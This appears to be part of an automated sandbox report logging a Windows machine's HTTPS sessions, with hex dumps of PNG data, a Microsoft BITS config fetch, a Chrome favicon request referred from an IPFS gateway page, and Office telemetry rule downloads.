                                                  Pragma: no-cache
                                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                  2024-10-31 19:49:44 UTC39INData Raw: 32 31 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 06 00 00 00 eb 21 b3 cf 0d 0a
                                                  Data Ascii: 21PNGIHDR!
                                                  2024-10-31 19:49:44 UTC8194INData Raw: 31 66 66 61 0d 0a 00 00 47 a9 49 44 41 54 78 5e ec d8 5b 6e e3 c0 96 6d d1 db ff 4e d7 fd a9 04 0e 26 8a 87 c1 78 48 b4 3d 06 b0 7e 2c ee b5 43 4e a5 44 eb ff fd 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: 1ffaGIDATx^[nmN&xH=~,CND?
                                                  2024-10-31 19:49:44 UTC5792INData Raw: 31 36 39 38 0d 0a dc 68 66 b5 67 34 4f 75 fe 2a 6f d7 f3 36 a7 74 cf ea be f6 8c e6 a9 ce 5f e5 6d 7a be 66 b7 f6 5f e5 a9 ce 5f 65 56 7b 9e 06 00 e0 e3 7a 43 72 fa c6 a4 7b 9a 51 9d 6b 66 b5 e7 2a a3 3a 77 95 5d da 3b db df f9 ab 8c ea dc 55 9e ea fc 6c cf 3f ed b9 ca a8 ce 5d e5 db 7a 9e ab 3c d5 f9 dd 3d b3 7d ff b4 e7 2a a3 3a 37 9a 59 ed 19 cd 53 9d bf ca db f5 bc cd 29 dd b3 ba af 3d a3 79 aa f3 57 79 9b 9e af d9 ad fd 57 79 aa f3 57 99 d5 9e a7 01 00 f8 b8 de 90 9c be 31 e9 9e 66 54 e7 9a 59 ed 69 66 b5 a7 79 ab 9e b3 19 d5 b9 e6 2d 7a ae 66 56 7b 9a 6f eb 79 9a 6f eb 79 9a 59 ed 69 56 b5 ef 2a b3 da 73 97 55 ed 6b de ae e7 6d 4e e9 9e d5 7d ed b9 cb aa f6 35 6f d3 f3 35 bb b5 bf 59 d5 be 66 56 7b ee 02 00 f0 75 bd 41 39 7d a3 d2 3d cd a8 ce 35 b3
                                                  Data Ascii: 1698hfg4Ou*o6t_mzf__eV{zCr{Qkf*:w];Ul?]z<=}*:7YS)=yWyWyW1fTYify-zfV{oyoyYiV*sUkmN}5o5YfV{uA9}=5
                                                  2024-10-31 19:49:44 UTC4407INData Raw: 31 31 32 66 0d 0a 66 75 ae 39 ad fb be b5 f7 93 de 33 ca 2e ed 7d da df b9 e6 96 de d1 dc d2 3b 9a d3 ba af 99 d5 b9 e6 94 ee 79 bb af 3d cd 29 dd b3 6b 5f fb 76 f5 02 00 c0 92 3e 4c 9b dd da 7f 6a cf 53 bd a7 39 ad fb 9e ee ed 5c b3 5b fb 57 f7 74 be 99 d5 b9 e6 b4 ee fb d6 de 4f 7a 4f b3 5b fb 9f ee e9 5c 73 4b ef 68 6e e9 1d cd 69 dd d7 cc ea 5c 73 4a f7 bc dd d7 9e e6 94 ee d9 b5 af 7d bb 7a 01 00 60 49 1f a6 cd 6e ed 3f b5 e7 a9 de d3 9c d6 7d 4f f7 76 ae d9 ad fd ab 7b 3a df cc ea 5c 73 5a f7 7d 6b ef 27 bd a7 d9 ad fd 4f f7 74 ae b9 a5 77 34 b7 f4 8e e6 b4 ee 6b 66 75 ae 39 a5 7b de ee 6b 4f 73 4a f7 ec da d7 be 5d bd 00 00 b0 a4 0f d3 66 b7 f6 9f da f3 54 ef 69 4e e9 9e 66 56 e7 9a dd da bf ba a7 f3 cd ac ce 35 a7 74 4f 73 5b ef 69 76 6b ff ea 9e
                                                  Data Ascii: 112ffu93.};y=)k_v>LjS9\[WtOzO[\sKhni\sJ}z`In?}Ov{:\sZ}k'Otw4kfu9{kOsJ]fTiNfV5tOs[ivk
                                                  2024-10-31 19:49:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449751184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-10-31 19:49:46 UTC467INHTTP/1.1 200 OK
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF70)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-neu-z1
                                                  Cache-Control: public, max-age=161756
                                                  Date: Thu, 31 Oct 2024 19:49:46 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.449759184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:47 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-10-31 19:49:47 UTC515INHTTP/1.1 200 OK
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF06)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-weu-z1
                                                  Cache-Control: public, max-age=161812
                                                  Date: Thu, 31 Oct 2024 19:49:47 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-10-31 19:49:47 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449762142.250.185.1004432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:47 UTC748OUTGET /s2/favicons?domain= HTTP/1.1
                                                  Host: www.google.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:48 UTC313INHTTP/1.1 404 Not Found
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Content-Type: text/html; charset=UTF-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 31 Oct 2024 19:49:48 GMT
                                                  Server: sffe
                                                  Content-Length: 1580
                                                  X-XSS-Protection: 0
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close
                                                  2024-10-31 19:49:48 UTC1065INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65
                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-se
                                                  2024-10-31 19:49:48 UTC515INData Raw: 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74
                                                  Data Ascii: p.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;widt


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.45232213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:32 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:32 UTC561INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:32 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 218853
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public
                                                  Last-Modified: Wed, 30 Oct 2024 23:56:08 GMT
                                                  ETag: "0x8DCF93E6CAB67A0"
                                                  x-ms-request-id: 3ed0e151-601e-0032-5264-2beebb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195032Z-16849878b78p49s6zkwt11bbkn00000009gg000000012zn3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:32 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                  2024-10-31 19:50:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                  Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                  Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                  Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                  Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                  Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                  Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                  Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                  2024-10-31 19:50:33 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                  Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.45232513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:34 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2980
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195034Z-16849878b78p8hrf1se7fucxk80000000awg00000000ane3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
